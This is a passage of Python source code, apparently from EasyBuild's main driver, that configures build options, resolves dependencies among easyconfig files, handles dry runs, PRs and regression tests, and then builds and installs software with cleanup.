    (try_to_generate, build_specs) = process_software_build_specs(options)

    search_query = options.search or options.search_filename or options.search_short

    # determine robot path
    # --try-X, --dep-graph, --search use robot path for searching, so enable it with path of installed easyconfigs
    tweaked_ecs = try_to_generate and build_specs
    tweaked_ecs_path, pr_path = alt_easyconfig_paths(eb_tmpdir, tweaked_ecs=tweaked_ecs, from_pr=options.from_pr)
    auto_robot = try_to_generate or options.check_conflicts or options.dep_graph or search_query
    robot_path = det_robot_path(options.robot_paths, tweaked_ecs_path, pr_path, auto_robot=auto_robot)
    _log.debug("Full robot path: %s" % robot_path)

    # configure & initialize build options
    config_options_dict = eb_go.get_options_by_section('config')
    build_options = {
        'build_specs': build_specs,
        'command_line': eb_cmd_line,
        'external_modules_metadata': parse_external_modules_metadata(options.external_modules_metadata),
        'pr_path': pr_path,
        'robot_path': robot_path,
        'silent': testing,
        'try_to_generate': try_to_generate,
        'valid_stops': [x[0] for x in EasyBlock.get_steps()],
    }
    # initialise the EasyBuild configuration & build options
    config.init(options, config_options_dict)
    config.init_build_options(build_options=build_options, cmdline_options=options)

    if modtool is None:
        modtool = modules_tool(testing=testing)

    if options.last_log:
        # print location to last log file, and exit
        last_log = find_last_log(logfile) or '(none)'
        print_msg(last_log, log=_log, prefix=False)

    # check whether packaging is supported when it's being used
    if options.package:
        check_pkg_support()
    else:
        _log.debug("Packaging not enabled, so not checking for packaging support.")

    # search for easyconfigs, if a query is specified
    if search_query:
        search_easyconfigs(search_query, short=options.search_short, filename_only=options.search_filename,
                           terse=options.terse)

    # GitHub options that warrant a silent cleanup & exit
    if options.check_github:
        check_github()

    elif options.install_github_token:
        install_github_token(options.github_user, silent=build_option('silent'))

    elif options.review_pr:
        print review_pr(options.review_pr, colored=use_color(options.color))

    elif options.list_installed_software:
        detailed = options.list_installed_software == 'detailed'
        print list_software(output_format=options.output_format, detailed=detailed, only_installed=True)

    elif options.list_software:
        print list_software(output_format=options.output_format, detailed=options.list_software == 'detailed')

    # non-verbose cleanup after handling GitHub integration stuff or printing terse info
    early_stop_options = [
        options.check_github,
        options.install_github_token,
        options.list_installed_software,
        options.list_software,
        options.review_pr,
        options.terse,
    ]
    if any(early_stop_options):
        cleanup(logfile, eb_tmpdir, testing, silent=True)
        sys.exit(0)

    # update session state
    eb_config = eb_go.generate_cmd_line(add_default=True)
    modlist = modtool.list()  # build options must be initialized first before 'module list' works
    init_session_state.update({'easybuild_configuration': eb_config})
    init_session_state.update({'module_list': modlist})
    _log.debug("Initial session state: %s" % init_session_state)

    # determine easybuild-easyconfigs package install path
    easyconfigs_pkg_paths = get_paths_for(subdir=EASYCONFIGS_PKG_SUBDIR)
    if not easyconfigs_pkg_paths:
        _log.warning("Failed to determine install path for easybuild-easyconfigs package.")

    if options.install_latest_eb_release:
        if orig_paths:
            raise EasyBuildError("Installing the latest EasyBuild release can not be combined with installing "
                                 "other easyconfigs")
        else:
            eb_file = find_easybuild_easyconfig()
            orig_paths.append(eb_file)

    categorized_paths = categorize_files_by_type(orig_paths)

    # command line options that do not require any easyconfigs to be specified
    no_ec_opts = [options.aggregate_regtest, options.new_pr, options.regtest, options.update_pr, search_query]

    # determine paths to easyconfigs
    paths = det_easyconfig_paths(categorized_paths['easyconfigs'])
    if paths:
        # transform paths into tuples, use 'False' to indicate the corresponding easyconfig files were not generated
        paths = [(p, False) for p in paths]
    else:
        if 'name' in build_specs:
            # try to obtain or generate an easyconfig file via build specifications if a software name is provided
            paths = find_easyconfigs_by_specs(build_specs, robot_path, try_to_generate, testing=testing)
        elif not any(no_ec_opts):
            print_error(("Please provide one or multiple easyconfig files, or use software build "
                         "options to make EasyBuild search for easyconfigs"),
                        log=_log, opt_parser=eb_go.parser, exit_on_error=not testing)
    _log.debug("Paths: %s" % paths)

    # run regtest
    if options.regtest or options.aggregate_regtest:
        _log.info("Running regression test")
        # fallback: easybuild-easyconfigs install path
        regtest_ok = regtest([path[0] for path in paths] or easyconfigs_pkg_paths, modtool)
        if not regtest_ok:
            _log.info("Regression test failed (partially)!")
            sys.exit(31)  # exit -> 3x1t -> 31

    # read easyconfig files
    easyconfigs, generated_ecs = parse_easyconfigs(paths)

    # tweak obtained easyconfig files, if requested
    # don't try and tweak anything if easyconfigs were generated, since building a full dep graph will fail
    # if easyconfig files for the dependencies are not available
    if try_to_generate and build_specs and not generated_ecs:
        easyconfigs = tweak(easyconfigs, build_specs, modtool, targetdir=tweaked_ecs_path)

    dry_run_mode = options.dry_run or options.dry_run_short
    new_update_pr = options.new_pr or options.update_pr

    # skip modules that are already installed unless forced
    if not (options.force or options.rebuild or dry_run_mode or options.extended_dry_run or new_update_pr):
        retained_ecs = skip_available(easyconfigs, modtool)
        if not testing:
            for skipped_ec in [ec for ec in easyconfigs if ec not in retained_ecs]:
                print_msg("%s is already installed (module found), skipping" % skipped_ec['full_mod_name'])
        easyconfigs = retained_ecs

    # determine an order that will allow all specs in the set to build
    if len(easyconfigs) > 0:
        # resolve dependencies if robot is enabled, except in dry run mode
        # one exception: deps *are* resolved with --new-pr or --update-pr when dry run mode is enabled
        if options.robot and (not dry_run_mode or new_update_pr):
            print_msg("resolving dependencies ...", log=_log, silent=testing)
            ordered_ecs = resolve_dependencies(easyconfigs, modtool)
        else:
            ordered_ecs = easyconfigs
    elif new_update_pr:
        ordered_ecs = None
    else:
        print_msg("No easyconfigs left to be built.", log=_log, silent=testing)
        ordered_ecs = []

    # creating/updating PRs
    if new_update_pr:
        if options.new_pr:
            new_pr(categorized_paths, ordered_ecs, title=options.pr_title, descr=options.pr_descr,
                   commit_msg=options.pr_commit_msg)
        else:
            update_pr(options.update_pr, categorized_paths, ordered_ecs, commit_msg=options.pr_commit_msg)

        cleanup(logfile, eb_tmpdir, testing, silent=True)
        sys.exit(0)

    # dry_run: print all easyconfigs and dependencies, and whether they are already built
    elif dry_run_mode:
        txt = dry_run(easyconfigs, modtool, short=not options.dry_run)
        print_msg(txt, log=_log, silent=testing, prefix=False)

    elif options.check_conflicts:
        if check_conflicts(easyconfigs, modtool):
            print_error("One or more conflicts detected!")
            sys.exit(1)
        else:
            print_msg("\nNo conflicts detected!\n", prefix=False)

    # dump source script to set up build environment
    elif options.dump_env_script:
        dump_env_script(easyconfigs)

    # cleanup and exit after dry run, searching easyconfigs or submitting regression test
    if any(no_ec_opts + [options.check_conflicts, dry_run_mode, options.dump_env_script]):
        cleanup(logfile, eb_tmpdir, testing)
        sys.exit(0)

    # create dependency graph and exit
    if options.dep_graph:
        _log.info("Creating dependency graph %s" % options.dep_graph)
        dep_graph(options.dep_graph, ordered_ecs)
        cleanup(logfile, eb_tmpdir, testing, silent=True)
        sys.exit(0)

    # submit build as job(s), clean up and exit
    if options.job:
        submit_jobs(ordered_ecs, eb_go.generate_cmd_line(), testing=testing)
        if not testing:
            print_msg("Submitted parallel build jobs, exiting now")
            cleanup(logfile, eb_tmpdir, testing)
            sys.exit(0)

    # build software, will exit when errors occurs (except when testing)
    exit_on_failure = not options.dump_test_report and not options.upload_test_report
    if not testing or (testing and do_build):
        ecs_with_res = build_and_install_software(ordered_ecs, init_session_state, exit_on_failure=exit_on_failure)
    else:
        ecs_with_res = [(ec, {}) for ec in ordered_ecs]

    correct_builds_cnt = len([ec_res for (_, ec_res) in ecs_with_res if ec_res.get('success', False)])
    overall_success = correct_builds_cnt == len(ordered_ecs)
    success_msg = "Build succeeded for %s out of %s" % (correct_builds_cnt, len(ordered_ecs))

    repo = init_repository(get_repository(), get_repositorypath())
    repo.cleanup()

    # dump/upload overall test report
    test_report_msg = overall_test_report(ecs_with_res, len(paths), overall_success, success_msg, init_session_state)
    if test_report_msg is not None:
        print_msg(test_report_msg)

    print_msg(success_msg, log=_log, silent=testing)

    # cleanup and spec files
    for ec in easyconfigs:
        if 'original_spec' in ec and os.path.isfile(ec['spec']):
            os.remove(ec['spec'])

    # stop logging and cleanup tmp log file, unless one build failed (individual logs are located in eb_tmpdir)
    stop_logging(logfile, logtostdout=options.logtostdout)
    if overall_success:
        cleanup(logfile, eb_tmpdir, testing)